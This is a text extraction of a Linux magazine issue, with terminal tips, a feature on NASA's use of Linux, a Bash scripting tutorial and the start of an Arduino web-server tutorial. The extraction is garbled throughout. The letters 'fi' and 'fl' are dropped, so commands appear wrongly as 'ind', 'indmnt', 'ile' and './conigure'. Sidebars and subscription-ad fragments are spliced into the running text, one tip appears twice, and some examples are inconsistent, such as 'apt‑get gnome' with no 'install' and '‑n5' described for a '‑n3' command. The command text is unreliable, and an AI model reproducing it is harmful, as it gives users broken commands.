space when df shows there is, use df -i to check for
free inodes.
Flush data to disk
Linux caches disk data, not writing
it immediately. This is faster and also reduces wear
on lash drives. If you want to make sure all data is
committed to disk immediately, run sync. It takes no
arguments and returns when all data is written – which
could be a while if you have just copied a large ile to a
lash drive.
>_77 See what is mounted
The mount command with no arguments shows what is
mounted and with which options, but indmnt gives a more readable output.
indmnt’s output can also be conigured with command-line arguments,
making it a better way of getting such information in scripts.
Mount network drives
This is similar to mounting local drives,
except the device is speciied as hostname:/path/to/
mount for NFS mounts and //hostname/path for Samba
mounts or Windows shares. The type is given as -t nfs
or -t cifs respectively.
Repair a damaged file system
If a ile system becomes corrupted, you
can try to repair it with fsck:
fsck /dev/sdb3
The ile system must not be mounted, which means
you may have to boot from a live CD to run this. If the
contents are important and not already backed up
(why?), make a copy with dd irst.
Clearer list
The df command
provides a
clearer listing
of what is
mounted where
than mount
or indmnt, if
you don’t need
to see all the
mount options.
Add labels to your file systems
When an automounter mounts a
USB stick, it uses the ile system’s label as the
mount point if there is one. Otherwise it uses
the UUID. You can add a label to an existing ile
system – the command is different for each type:
e2label /dev/sdb1 Photos
fatlabel /dev/sdb1 Music
Run either of these without giving a label and it
will tell you the existing label.
Master the terminal
System information
Get information on the contents of your computer
Finding files
Finding one ile in a terabyte of data
makes the proverbial haystack look small. The ind
command searches your ile system like this
ind ~ - iname '*embarrassing_photo*'
The quotes are needed when you use a wildcard.
>_81 Test your drives’ health
Hard drives have a self-monitoring system called SMART
(you may need to enable this in your motherboard’s BIOS menu). You can
access this with smartctl:
smartctl -i /dev/sda
smartctl -H /dev/sda
smartctl -t short /dev/sda
The irst command prints information about your drive, the second reports
its health status and the third runs the short selftest. The tests run in the
background, so you can continue to use the drive.
Sort it
When running a
command that
reports values,
like du, pipe the
output through
sort -h to
list the info in
numerical order.
What’s in the box
You can list the PCI hardware, which
also includes on-board devices, with lspci. Adding
-k shows the kernel driver used for each device. If
your hardware works with one distro but not another,
this should show what is missing in terms of drivers.
Check free space
The du command shows the disk space
used by directories and the iles within them, but ncdu
gives a much more friendly display. With no arguments,
it shows the disk usage of the current directory in size
order. Pass it a directory to check elsewhere. You can
drill down through the directories to ind the space
hogs. You may want to use the -x option to restrict it to
the current ile system.
Check free memory
The command for this is imaginatively
named free. You may want to add the -h option to
see human-readable values – the default of kilobytes
makes no sense these days. Any Linux system that has
been running for a while will show little free memory,
because Linux uses all otherwise unused memory for
caching. free shows this, along with how much memory
you actually have available in the last column.
lspci -k
About the kernel
If your kernel was built with the
CONFIG_IKCONFIG_PROC option enabled, you
can view its entire coniguration in the virtual ile
/proc/config.gz, so you can see exactly what
hardware and other features have support included.
Listing all hardware
The lshw command outputs a
comprehensive listing of your hardware. It is long, so
pipe it through a pager like less. You can also have
it output HTML, with the -html option, ready for
pasting in a webpage (or even a yucky HTML email).
Faster find
ind searches the ile system so is not
instant. locate uses a database of all iles on your
system, updated daily by a cron job. It is much faster,
and doesn’t need wildcards, but is not completely up
to date. If you need to update before a search, run
updatedb as root, ideally with sudo.
Brief OS information
Use uname to report one or more of the
kernel version, OS, hostname, CPU type and more. Print
the lot with uname -a or specify individual components
to report on. The output is terse and particularly useful
when scripting.
Really detailed information
Install and run inxi to see a lot of
detail on your system. The default output is brief,
but you can increase this with -v followed by a
number up to 7, or you can tell it to show information
on particular subsystems.
A few more...
Various handy tips and commands to use in your shell
Use wildcards to match multiple
iles. To copy photos in the current directory, use
cp *.jpg dest/
* matches any sequence of characters except /,
? matches a single character.
Handling tarballs
If tarballs (ile archives) have an
extension after the .tar, they’re compressed, but
the tar command can still handle them.
tar tvf tarball.tar.bz2
tar xf tarball.tar.xz
The irst command lists the contents of a tarball;
the second unpacks it to the current directory.
Windows ZIP files
View the contents of a ZIP archive
compressed ile with unzip -l;
drop the -l to unpack it.
Search a file
grep searches iles for lines
matching a given pattern. To look for error
messages in a log ile, you could use:
Counting content
wc someile ...
Back it up
…will report the numbers of lines, words and characters
in each of the iles it is given, or from standard input,
along with the total for all iles. Use -c, -w or -l if you
are interested in only one of those values.
Reading standard input
Many commands will accept standard
input via a pipe in place of a ile to work on if no
ilename is given. Many also accept - as a ilename,
which means to read from stdin. The latter has the
advantage that a program can read from both standard
input and one or more iles.
When using the
-i option with
sed to modify
files in place, use
-i.bak to create
a backup of the
original file.
Changing file contents
The Stream EDitor sed is used to edit
streams of text. It is extremely powerful but can also be
used for simple tasks like search and replace. It works
on iles or with text on standard input, hence the name.
To replace all occurrences of foo with bar in a ile, you
would use:
sed -i s/foo/bar/g someile
The -i option replaces the ile with the changed version
instead of simply outputting the changed data.
grep -i err logile
grep is case sensitive by default; -i changes that.
Viewing the beginning or end of a
The head and tail commands show the irst or
last ten lines of a ile. The -n option can be used to
view a different number of lines.
tail -n 1 someile
What is a file?
Linux doesn't use ile extensions to
distinguish between ile types, but looks at the
contents. The ile command will tell you what
type of data a ile contains, and often more – like
the dimensions of an image.
ile ile1 ile2 ...
>_100 What is a file?
Linux doesn’t use ile extensions to distinguish
between ile types, but looks at the contents. The ile command shows
what type of data a ile contains, and often more – like image dimensions.
Official Magazine Subscription Store
FROM £13.70 EVERY 3 MONTHS (€79/$100 PER YR)
Biggest savings when you buy direct
Choose from a huge range of titles
Delivery included in the price
ORDER HOTLINE: 0344 848 2852
S 7
D 201
You might also like...
(€73.40/ $92.88 PER YR)
(€116/$159 PER YR)
(€108/$155 PER YR)
Why taking away our
privacy makes us less safe
Create an eye-catching
endless tunnel effect
Essential tips from experts
on learning to code
How to use clip-path to
create striking text effects
The voice of web design
The easy way to understand the needs
and expectations of your customers
Issue 298 : October 2017 :
(€104/$137 PER YR)
(€105/$156 PER YR)
*Terms and conditions: Savings calculated against the full RRP (single issue price x frequency). Dollar prices quoted are for the United States, other global territory dollar pricing may vary. This offer is for new
subscribers only. You can write to use or call us to cancel your subscription within 14 days of purchase. Your subscription is for the minimum term speciied and will expire at the end of the current term. Payment is
non-refundable after the 14 day cancellation period unless exceptional circumstances apply. All gift subscriptions will start with the irst issue in January 2018. Your statutory rights are not affected. Prices
correct at point of print and subject to change. Full details of the Direct Debit guarantee are available on request. For full term and conditions please visit: Offer ends 31st December 2017.
Linux in Space
Linux is key to much of NASA’s space exploration but, paradoxically, its
influence isn’t universal, as Mike Bedford reports
ASA was in the news again earlier this year
as Juno, its space probe in orbit around
Jupiter, flew within just 9,000km of the
giant planet’s cloud tops. Of particular
interest were impressive and detailed images of the
Great Red Spot, the turbulent storm, 1.3 times the
diameter of the Earth, which scientists think might have
raged for over 350 years.
Meanwhile, 550 million kilometres away, the Mars
rover Curiosity has just celebrated the fifth anniversary
of its touch-down on the surface of the Red Planet.
While not as much in the public eye as it was back
in 2012, this miracle of astronautical engineering
continues to return eye-catching photos and enough
data to keep scientists busy for many years to come.
Designing these and NASA’s many other spacecraft,
some of which are even more distant from the Earth,
planning and operating their missions, and processing
the imagery and data they generate, requires some
major computing resources. As users of highperformance computers, and especially for science and
engineering applications, you might reasonably expect
that NASA would be first and foremost a Linux user.
And while NASA is, indeed, a major user of our favourite
operating system, it would be wrong to suggest that
Linux enjoys universal support at America’s space
agency. Here we look at where Linux is used and why
and, perhaps even more intriguingly, at the applications
in the Top 500 list of the world’s fastest computers.
Since it’s so dominant in the world of supercomputing,
these facilities rely square on Linux. Benefits cited by
users of high-performance computing facilities include
Linux’s modular nature, its scalability, community
support and low cost.
Advanced supercomputing division
As a facility available to all NASA’s departments, the
phenomenal computing power at NAS is brought to bear
on a staggering array of different applications. One that
has been gaining more public appreciation in recent
years is the search for exoplanets – that’s planets
beyond our solar system – and, in particular, for ones
that are within the habitable zone around their star and
might, therefore, be capable of hosting life. This isn’t
the place to discuss the intricacies how these planets
are detected but, given the almost unimaginable
numbers of stars in the sky, it’s clear that this is akin to
searching for the proverbial needle in a haystack, a job
that only the fastest computers can tackle.
Since NASA is, perhaps, best known for its manned
and unmanned space exploration programmes, another
key application of the computing facilities at the Ames
Research Center is during the design of spacecraft.
Indeed, all recent missions have involved putting the
spacecraft through their paces before they’re ever
built. One of NASA’s current high-profile projects is the
Juno Cam
publishing raw
images from its
Juno spacecraft,
that’s now
orbiting Jupiter,
Download them,
process them,
for example,
by adding your
own colour
and share
your results.
NASA’s Advanced Supercomputing division (NAS) has not one but
four supercomputers. Top spot goes to Pleiades
where it doesn’t get a look-in, and the reasons for this
apparent drop-off.
NASA has some serious computing muscle at its
beck and call, but the scale of those resources might
be something of an eye-opener. Based at the Ames
Research Center at Moffett Field in California’s Silicon
Valley, NASA’s Advanced Supercomputing division (NAS)
has not one but four supercomputers. Top spot goes to
Pleiades, named after a star cluster in the constellation
of Taurus; with over a quarter of a million Intel Xenon
cores, it achieves petascale computing (in excess of one
quadrillion floating point operations per second), and
boasts 15th place
development of the Space Launch System (SLS) and
associated Orion capsule. NASA has been without any
means of putting a human into Earth orbit since 2011
when the Space Shuttle Atlantis made its final flight.
SLS and Orion are aimed to provide a manned space
flight capability once again, even though it’s likely to
be 2021 or later before they first take humans into
space. But while the Saturn V rocket and Apollo that
took man to the Moon went from concept to first flight
in a little over seven years, these new spacecraft will
have undergone a ten-year development programme,
enough time to carry out the most stringent tests. An
important part of that testing regime is simulation
by computational fluid dynamics (CFD). Running on
the Pleiades supercomputer, CFD software is
tasked with analysing the flow of air
and exhaust gases around all
parts of the spacecraft
to study, among
Linux in Space
educational activities and outreach, human research,
physical sciences, and technological development
and demonstration. Given that these experiments will
have mostly been devised by academics outside NASA,
this preference for Linux isn’t at all surprising. It’s also
interesting to note that Robonaut 2, the humanoid robot
that is being put through its paces on board the ISS,
runs an embedded version of Linux on its 38 PowerPCbased processors. According to NASA, the robot isn’t
only used for research but could also play a part in the
operation of the space station. Thanks to its humanoid
design, Robonaut 2 can take over simple, repetitive or
particularly dangerous tasks on places such as the ISS.
We migrated key
functions from Windows to
Linux because we needed
an operating system that
was stable and reliable
Above Simulating the
aerodynamic forces on
the SLS rocket, during
separation of the solid
fuel boosters, on the
Pleiades supercomputer
Since Robonaut 2 is approaching human dexterity, tasks
such as changing out an air filter can be performed
without modifications to the existing design.
Right NASA’s
Robonaut 2 humanoid
robot, currently flying on
board the International
Space Station, has an
embedded version of
Linux at its core
No-go areas
other things, aerodynamic performance, temperature
distribution, and forces. In a recent press release, NASA
indicated that this work, on the SLS alone, had consumed
20 million core hours of computing time over two-years.
Linux in orbit
NASA has
Boeing to
a computer
for possible
use on board
spacecraft that
uses a radiationhardened ARM
processor and can
run both UNIX and
Linux in parallel.
NASA’s use of Linux isn’t restricted to its supercomputing
facilities, Indeed, in 2013 the space agency heralded a
major shift in policy on the International Space Station
(ISS). The dozens of laptops on board the ISS were to
be migrated from Windows XP to Debian Linux. Keith
Chuvala of NASA contractor the US Space Alliance
explained the rationale for the shift. “We migrated key
functions from Windows to Linux because we needed an
operating system that was stable and reliable – one that
would give us in-house control”, he said. “So if we needed
to patch, adjust or adapt, we could.” It’s also pertinent
to point out that, during its Windows era, laptops on this
platform orbiting 400km above the Earth’s surface were
infected by a virus, reportedly brought on board on a
Russian cosmonaut’s laptop. We might reasonably expect
this to be a far less likely eventuality in the new Linux era.
As well as routine housekeeping jobs, laptops on
board the ISS are used for a whole host of scientific
applications. In fact, conducting orbital research is
one of the main tasks for the crew. NASA lists literally
thousands of experiments that have been carried out
on board the ISS, mostly falling into the categories of
biology and bioengineering, Earth and space science,
Despite the glowing picture of Linux in NASA, there are
several areas of the organisation’s activities where Linux
doesn’t get a look-in and places it’s not allowed to go. In
some cases, the reason is obvious and unequivocal (see
The Voyager Experience box, p37). In other areas, though,
while a decision to spurn Linux might not be as clear-cut,
it’s a perfectly reasonable choice.
When radio signals can take minutes or hours to reach
a spacecraft, as will be the case with probes that are
well beyond Earth orbit, those spacecraft can’t rely on
minute-by-minute commands from Mission Control. So
while NASA is able to transmit high-level commands, the
spacecraft have to be capable of autonomous operation
in many areas. This means that tasks have to process
data in a timely and predictable manner, which is the job
of a real-time operating system (RTOS). Commonly, such
operating systems have been designed from the ground
up to meet this requirement and, although there are realtime variants of Linux, these are few and far between and
at least one commercial offering has been discontinued.
It’s not surprising, therefore, that when NASA needed
an operating system for the Mars Curiosity Rover, it
took the decision to use the same operating system that
had proved itself on the earlier Spirit and Opportunity
Martian robots: the VxWorks RTOS from Wind River.
Indeed, VxWorks has flown on NASA missions for over
two decades.
This culture of conservatism is endemic at NASA
and not without some justification, given the huge
cost of failure. That Curiosity rover, for example, cost
$2.4 billion and represented eight years of work before
it ever landed on the Red Planet. Such a high price tag
is by no means unique. The Cassini-Huygens mission to
Saturn and its moon Titan cost $3.26 billion, while the
International Space Station has cost $160 billion to date,
making it the single most expensive man-made object.
It’s understandable, therefore, that there’s a preference
for the tried-and-tested solution wherever possible.
And it’s not as if it’s easy to swap out the software on
a spacecraft a few hundred million miles away. As one
commentator put it, upgrading the operating system
would be like changing the tyre on a car while driving
down the motorway at 70mph.
But while the ‘belt and braces’ philosophy is unlikely
to be superseded at NASA any time soon, and this will
influence the choice of operating system on far-flung
space probes, the same doesn’t apply to the software
that interfaces with them here on Earth. Although the
Curiosity rover might be running a proven if somewhat
dated operating system on the Martian surface, back
at NASA’s Jet Propulsion Lab in Pasadena, California,
Linux is at the fore. Pride of place here goes to The
Rover Sequencing and Visualization Program (RSVP)
which provides the operators with information on the
Martian terrain and Curiosity’s status. It can then rapidly
assemble command sequences and test them out by
simulation, before uploading them to the rover on Mars.
So Linux is alive and well on NASA’s computers here
on Earth but, so far, the furthest into space it’s been
employed is in the International Space Station’s low earth
orbit. All that might be about to change, you might think,
when the Orion programme takes to the skies with its
The Voyager Experience
Between them, the two Voyager spacecraft have
visited all the outer planets – Jupiter, Saturn,
Uranus and Neptune – and many of their moons.
Both are now heading into interstellar space;
Voyager 1 became the first man-made object
to leave the solar system in 2012, and is now
13 billion miles away. Amazingly, it’s still in
contact with NASA. And, just in case they are ever
found by extra-terrestrials, each craft carries a
gold disc containing sounds and images portraying
the diversity of life and culture on Earth.
Despite representing one of NASA’s most
successful space programmes, the Voyager
probes do not run Linux. The reason is clear
to see. By the time you read this, the Voyager
spacecraft will have been in space for 40 years.
Linux, on the other hand, is just 25 years old.
potential to take man back to the Moon and even to Mars.
But no, already, this new spacecraft is locked into a flight
computer that was design in 2002 for use on the Boeing
787. It has somewhat archaic hardware, because of the
requirement for radiation-hardened processor to survive
the rigours of space, so it doesn’t run Linux. However,
given that laptops are an essential part of life on the ISS,
and that those laptops run Linux, might there just be a
possibility, when Orion first takes to the sky, that onboard laptops might represent Linux’s final frontier?
Above Since 2013, when
Windows was ousted,
the dozens of laptops
on the International
Space Station all run
Debian Linux
Tiny satellites
CubeSats are tiny
satellites that are
so cheap to build
that they’ve even
been produced
by amateur
who were able to
hitch a ride into
orbit. Commonly
they run Linux.
Essential Linux
Master shell scripting:
More tricks to try in Bash
is a university tutor
in Programming
and Computer
Science. He likes
to install Linux on
every device he can
get his hands on,
and uses terminal
commands and
shell scripts on a
daily basis.
A terminal
running the Bash
shell (standard on
any Linux distro)
We explore more constructs and commands that help
scripting act as a fully fledged programming language
Last month, we saw that Bash scripting can be used as
a specialised programming language. Bash scripting is
very rich in features, and we met conditionals, variables,
for loops, command-line arguments and functions.
This month, we’ll be continuing where we left off. Bash
scripting supports still more programming constructs,
including while loops and case statements. We’ll also be
meeting sophisticated ways of chaining and grouping
commands, which are particularly powerful when
combined with the pipelines that we met in the first
article in the series. We learned last month that every
command, script and function in a Bash script returns
a numerical exit code, and this fact will be important
throughout the article this month.
Last, we’ll meet a few new useful commands that we
can use in our scripts.
By this point, you should be feeling fairly comfortable
with shell scripts, and you should make the effort to start
writing scripts yourself to speed up commonly performed
tasks. There is a very rich range of command-line tools
that you can use in your scripts: for example, you can use
the program xdotool to perform key presses and mouse
clicks automatically. We’ll be drawing the focus more
towards real-life applications of shell scripting starting
from this article.
In the last issue, we explored the fact that every
program, function or shell script in Linux exits with a
numerical exit code, where 0 denotes normal exit and any
other number indicates an exit that is unusual in some
way. We met the command read, which reads a line of
text from standard input into a variable. read normally
exits with a code of 0, but it exits with a code of 1 when
it encounters the end-of-file character, either because it
has reached the end of the input file or because a user
has pressed Ctrl+D at the console.
This exit code behaviour makes it easy to write
scripts that repeatedly read a line of text and perform
some action on it. To do this, we use the while-loop
construct that is available in Bash. While loops in Bash
behave in a similar way to how they behave in other
languages: in Bash, a while loop takes a command as
input and then continually executes its body until that
Below While-loops and case statements are commonly used in production-level shell scripts
Tutorial files
command returns an exit code other than 0. For example:
while read line
echo "You typed: $line"
This script reads in input from the user and prints it out
with the prefix ‘You typed:’. It will continue to run until
the user presses Ctrl+D (or it reaches the end of an input
file), at which point the command read will exit with code
1 and the while loop will end.
A very similar keyword in Bash is until. This behaves
exactly like while, but now it executes its body while the
command’s exit status is not 0.
For example, your author uses a command-line tool
called netctl to connect to the internet. The connection
is poor, and sometimes goes down without a reason.
In that case, if we try to connect to the network using
netctl, the program prints an error message and exits
with an exit code of 1. Sometimes we want to tell the
computer to keep on trying to connect to the network
until it is successful. In that case, we can use an
until sudo netctl start my_network
sleep 5
The loop will run until the netctl command succeeds in
connecting and returns an exit code of 0. The sleep 5
command in the body of the loop (which pauses execution
for 5 seconds) isn’t really necessary – we could have used
the ‘empty command’ : instead – but if we don’t manage
to connect now, then it’ll probably be at least 5 seconds
till we can connect again, so it makes sense to allow the
CPU do other things during this time.
Case statements
The last ‘control’ structure that we will meet is the
case statement. If you have programmed in C or
related languages, you might be familiar with the
switch‑case structure; this is the Bash equivalent.
It is a slightly cleaner alternative to an if…elif…else…
i block if you find yourself with a variable that could
take on multiple values, and you want your program to
execute different code depending on which value the
variable holds.
For example, we might write a script that takes a
command-line argument. This argument could be run,
to run the main code, test to run tests, or help to print
a help message. In that case, the code in Figure 1 will do
what we want.
Let’s examine this code in a bit more depth. The first
line, case $1 in, means that we are branching based
on the value of $1, the first command-line argument.
This is followed by a succession of case branches, each
consisting of a case pattern and some lines of code. For
example, if the command-line argument is run, then that
Figure 1
case $1 in
echo "Invalid argument."
echo "Please use 'run', 'test' or 'help'."
Above Case statements are commonly used to decide what to do based on a
command-line argument
will match the first branch, and Bash will run the function
The pattern arguments run, test and help are
followed by a close bracket ), which delimits them from
the code that we want to run. In this case, we have
matched on simple strings, but we can match globs, e.g.:
case $1 in
# ...
Exit codes
…would run the tests if the user typed in any word
beginning with ‘test’ at the command line, such as test
1 or testimony. In the example in Figure 1, we have used
the glob *) to match any remaining strings. This is a bit
different from languages like C, where the input variable
has to match exactly one of the case branches. In Bash,
Every time a
command-line program
reads input from the
console, it can take input
from another program
the first case branch to match the string is executed, so
the branch starting *) won’t be run unless the commandline argument does not match any of the other branches.
We can also use the pipe character ‘|’ to signal an
either-or. So, run|test) will run the case branch if the
user types either run or test.
The last part of the case branch is the double
semicolon ;; which marks the end of the branch.
While-loops in Bash
use exit codes in
order to determine
whether or not
to run another
iteration. In fact,
conditionals (if
statements) work
according to
exactly the same
mechanism: the
conditions of the
form [[ a -lt b ]] and
so on that we met
last time can in fact
be run directly as
programs – they
return an exit code
of 0 or 1 depending
on whether the
condition is true
or false. This
means that you
can use the same
conditions in while
loops as well.
Conversely, you
can use actual
programs as
conditions in your
if statements.
line vs GUI
If you are used to
programming in an
IDE, then it might
seem strange to
use a commandline debugger, but it
has its advantages,
as we can see.
Though it’s always a
good idea to use an
IDE for complicated
languages such as
Java, editors and
the command line
are a very effective
environment for
programming in
small languages
such as C. Thanks
to the shell
mechanism, every
command-line tool
is automatically
scriptable. With a
graphical program,
you can only
automate things
if the developer
has built in that
Essential Linux
In order to terminate the case statement, we use the
keyword esac.
More pipes: the yes command
When we introduced pipes, we might have given the
impression that they are only useful for special programs
that take in input line-by-line, but this is not the case.
Every time a command-line program reads input from the
keyboard, it is reading from stdin and can therefore take
input from another program.
As an example of this, many package managers (e.g.,
APT, YUM, Portage, Pacman) prompt the user to type Y
for yes before installing software:
$ sudo apt‑get gnome
[ … ]
Do you really want to install this
software? [Y/n]
If installing multiple pieces of software, you might want
to automate this so that you do not have to press Y every
time. Luckily, Linux provides a command that will help
you do this. The command is called yes, and all it does is
print out the letter Y until you force it to stop with Ctrl+C:
$ yes
That means that you can skip confirmation by piping the
output from yes into your package manager:
$ yes | sudo apt‑get gnome
[ … ]
Do you really want to install this
software? [Y/n] y
[ … ]
Below We often use
the tail command to
display the last (most
recent) lines of a log file
Here, the affirmative y is printed automatically. Since
yes prints out y infinitely often, this will continue to
work however many times the program prompts us
for confirmation.
If we want to print out something other than y, we can
pass it to yes as a command-line argument: yes linux
will print out linux until it is forced to stop.
Making head and tail of things
Two commands that are sometimes useful are head and
tail. head prints out the first few lines of input, while
tail prints out the last few. For example:
$ yes | head ‑n3
Here, the command-line switch ‑n5 tells head to print out
the first 5 lines of input.
$ < /usr/bin/startx tail ‑n2
exit $retval
In this case, tail ‑n2 prints out the last 2 lines of the file
/usr/bin/startx, a script that sets up the X windowing
system on some Linux distributions.
Exercise: Run the commands head ‑n5 and
tail ‑n5 without piping. What is the difference in
the way these two commands operate? Why is this
difference necessary?
Chaining commands
A common way to distribute Linux programs is as a
source package with a Makefile. In order to install the
package, the user has to do three things: run a script
called conigure, which checks system details that will
be relevant to the installation, then run the command
make to compile the code, and lastly run make install to
install the software on their system. In order to automate
this, we might write a script as follows:
make install
However, this isn’t quite right, since each of these three
steps is prone to failure. If either the conigure stage or
the make stage fails, then we don’t want the rest of the
steps to run.
To deal with cases like these, Bash provides the double
ampersand operator &&, which can be used to chain
commands together. The second command will only run if
the first one exits with code 0. So we can write our script
instead as:
./conigure && make && make install
This way, if the conigure script fails and exits with nonzero exit code, the remaining steps will not run.
The opposite operator to && is the double pipe operator
||. This time, the second command will run only if the
first command terminated with a non-zero exit code:
mkdir tmp || echo "Failed to create
The third way to chain commands is using a semicolon
;. This is no different from writing the commands on
separate lines as we normally do, but it is sometimes
useful to put multiple commands on the same line:
$echo hello; echo world
Grouping commands
Sometimes it is useful to group multiple commands
together as though they were acting as one command,
particularly when we are using pipes. As an example,
the program GDB is a command-line tool that is very
commonly used for debugging C and C++ programs. GDB
starts up its own prompt and accepts certain commands.
For example, the command break sets a breakpoint at
a line of code, n skips to the next line, and the command
Sometimes it is useful to
group multiple commands
together as if they were
acting as one command
Above Command-line debugging tools, such as GDB, have an important advantage over
graphical versions: they are fully scriptable
It is very important that you leave a space after the
opening brace and another before the closing brace;
otherwise this will not work. The semicolon after the final
command is also essential.
Using xargs
We will meet one final very useful command. You
might have noticed that a number of shell commands,
including touch, mkdir, echo, rm and cat can take a
number of arguments at the command line. For example,
touch ile1 ile2 creates two new files called ile1
and ile2. This works well when we are typing at the
command line or using globs.
Suppose, however, we’ve been sent a iles_for_
deletion file containing a list of other files which need to
be deleted. We could delete them all using a while loop:
print can be used to print out the values of variables and
expressions within the program.
While debugging a program, we sometimes find
ourselves having to go through the same steps over and
over again. While we can avoid some of this by using
breakpoints effectively, we can also speed things up
using shell commands. For example, suppose that every
time we start GDB we set a breakpoint on line 100, print
the value of a variable xyzzy, then skip through 100 lines
of code (for example, to iterate a few times through a
loop) and then hand control back to the terminal. Then we
could use the following command:
{ echo 'break 100'; echo 'run'; echo 'print
xyzzy'; yes 'n' | head ‑n100; cat; } | gdb
The commands we run are all ones we have met before.
The echo commands at the beginning pass commands
directly into GDB. The yes command piped through head
sends the command n to GDB 100 times and last, the cat
command hands control back to the console. The only
new bit of syntax is the curly brace construct. Putting
commands in between curly braces causes them to be
run sequentially as one command.
< iles_for_deletion while read ile
rm "$ile"
However, this spawns a separate instance of rm for
each file on the list: we would like to call one instance
of rm, but with all the different filenames as commandline arguments.
The command we use to do this is called xargs, and it
converts line-separated input from standard input into
a list of command-line arguments. In this case, we could
call it using the following command:
< iles_for_deletion xargs rm
We can use xargs with pipes as well. For example, to
delete all files in the current directory that match the
pattern windows, you could run:
ls | grep windows | xargs rm
Note that this will not work properly if some of your
filenames contain newline characters.
Create your own HTTP server
powered by Arduino
is a computational
physicist. He
teaches Arduino to
grad students and
discourages people
from doing lab
work manually.
Arduino board:
Uno, Leonardo or
Arduino IDE
Ethernet & SD
Available in many
online stores
microSD card
A basic text
Arduinos are designed for hardware, but the right model can
still power through a lot of computing
Establishing an online presence is a task easily
accomplished with a personal website. While websites
are a great platform to showcase your skills, there’s
no reason we can’t show off our Arduino prowess and
avoid paying money to host content on a server at the
same time. This month we are going to begin a series of
Arduino tutorials that take the microcontroller board out
of its comfort zone and we start by transforming it into a
simple HTTP web server.
Alarm bells should be ringing in your head right now:
aren’t Arduinos meant for hardware projects? Well, yes
entirely. Arduinos also have a maximum program size
and a relatively small amount of memory, making this
difficult. We could also do this cheaply with an actual,
albeit small, computer such as the Raspberry Pi. We also
won’t be able to do much (if any) server-side processing
– so no database queries. These are three strong
arguments against using an Arduino for this. However,
if you have an Arduino Yún then this isn’t the case at all,
and if you have a Mega the program size isn’t an issue
and extra features can be added as needed.
The benefit of using an Arduino and programming your
own server is that you can also serve other commands
of your choosing. This allows your web server to double
up as an IoT device, controlling items around your home.
You could be boiling a kettle, opening the garage door, or
even controlling motors on some kind of robot you built
yourself, all feeding back to the user on their browser. An
Arduino server can become the gateway into your world.
Set up the hardware
You’ll need an Arduino board, a way of connecting
it to your internet router and SD card reading capability.
For this tutorial, we used the Arduino Leonardo and
the Ethernet & SD card shield. Immediately, you’ll need
to insert the shield into the Arduino’s header pins and
connect your shield to the router with an Ethernet cable.
You’ll also need to power your Arduino – but for now, plug
it into your computer with a USB cable.
You should log into your router, identify your device’s
local IP address and check that you have configured
your router correctly. If you don’t have access to the
administrator login, you might be able to determine
its network address using nmap or arp -a. At the top
of the example ‘WebServer’ sketch (under Ethernet
Library sketches), you’ll need to change your IP and MAC
addresses to match.
This allows your web
server to double up as an
Internet of Things device,
controlling items around
your home
Upload this sketch, as is, to your Arduino. If all is well,
you should be able to connect to your device from any
browser and it should display a sensor reading. As you
haven’t connected anything to the input pin, it’s probably
going to be zero or just garbage, but that’s okay, we’re
going to get rid of it anyway.
Read HTTP requests
Open the serial monitor within the Arduino IDE
and connect to your device on your browser. A stream
of text should appear. This is the HTTP request that the
browser is sending to the Arduino. At the beginning is
the request method in all caps, followed by the resource
requested. Briefly, the browser is sending a request to
ask the server to GET a resource, such as a webpage
(in this case just ‘/’). A web server should then send a
response message after determining the nature of the
request and assessing resources. For example, if a page
is not found, it should reply ‘HTTP/1.1 404 Page Not
Found’. This is a header and would be a response to a
HEAD request. This can be followed by a message, such
as the main body of a webpage.
information. To save on program space, the GET request
should call a function that returns the header information
and then finishes off with the message body. Begin
by making a function which can reply with the HEAD
information, as in the first four client.println() calls
in the example code. Depending on the availability of
resources on the SD card and the request sent, we will
want to change this code by passing it in as an argument,
but for now we’ll just use the ‘200 – OK’ code.
Now add another function which can process GET
requests. This function should check the SD card for a file
with the same path as the requested resource and return
an OK code if present, or an error code if not, followed by
the content of the resource (or an error page). This check
if (client.available())
String reqType = mesgbuff;
Go global
Don’t be afraid to
declare character
arrays as global
variables. While
it’s generally not
recommended, in
such a constrained
program it will make
accessing the useful
data very easy. In the
example sketch, the
client and the server
functionality was
declared this way.
Similarly, it would
be useful to declare
the SD card file as a
global variable too.
if (reqType == "GET")
else if (reqType == "HEAD")
can be done with SD.exists(), but to initialise the SD
card you’ll need to add a line at the top of the sketch:
#include <SD.h>
To return the content, you also need to declare and open
the file, read the contents (see the SD card example
sketches), then print the file contents back to the client.
What we are going to do here is emulate the server
behaviour by responding appropriately to certain HTTP
request types. To begin, you’ll need to write a function
to read the HTTP request letter-by-letter, saving to
a character array, and pausing when you receive a
whitespace character. You should then convert that
character array to a string and compare the received
request to the methods your Arduino is going to serve.
For now, we’ll deal with GET and HEAD. You’ll also want to
store the resource name.
Serve HTTP requests
The GET request is just like the HEAD request,
but with an additional body that follows the header
Create the website files
Before we can test the server, you’ll need to
create a set of HTML files for the Arduino to send to the
client. These days, using just HTML and CSS alone, it is
possible to quite quickly make a somewhat interactive,
elegant website automatically compatible with different
display sizes. Because we are dealing with GET requests
appropriately rather than just sending a single page
every time, as some people have done, we are able to
use the iframe and object tags and host our own images.
However, because you can’t install software or run
scripts on the Arduino server, some of the tricks with
PHP, JavaScript and other languages won’t necessarily
work. There are also issues with speed. Sending a 10MB
image to the client will take a while. However, creating a
forward-facing minimalist website is possible and can be
done in a few hours.
When saving your files, be sure to not use more than
three characters in the extension and eight characters
in the filename. The SD library won’t allow more, and it’s
very easy to think your code isn’t working rather than
assume it’s something as simple as this – your author
wasted a day on this problem: use .htm. When done,
insert the SD card into the shield and reset your Arduino.
Test and fix your server
In the main loop you should now be able to
compare the string comprising of the requested method
and the methods served by the Arduino and then call
the appropriate function. Upload this new sketch to the
board and try out your website. You should be able to
use your local IP address followed by the filename, for
example The server isn’t yet
fully operational, but we’re getting there. As you navigate,
several problems should become apparent.
server which can host a basic website that, with the right
router configuration, can be accessed from the outside
world. Any cool features, like CSS animations, filters and
scripts, will need to be done client side, and any database
lookups just can’t be done. The good news is that we at
least comply with some of the HTTP protocol and, for
most viewers, this will just seem like a normal website.
Nevertheless, our functionality is still quite restricted.
Let’s suppose we want someone to be able to leave
comments, or use this to run a personal blog. We’re going
to need to add in another HTTP method: POST.
However, as those using an Arduino Uno or Leonardo
have probably noticed, we’re already running up against
the maximum program size, which is limited to 28KB.
The SPI, SD and Ethernet libraries take up a lot of the
program space, but we’ve contributed our fair share too.
It’s time to get rid of any unnecessary print statements
(although keep printing the incoming request to screen),
Creating a forwardfacing minimalist website is
possible and can be done in
a few hours
and clean out the code. We only need to make a little bit
of room for an extra function and an extra if condition in
the main loop.
First of all, regardless of what happens, the ‘200 – OK’
code is returned. Second, the server is always responding
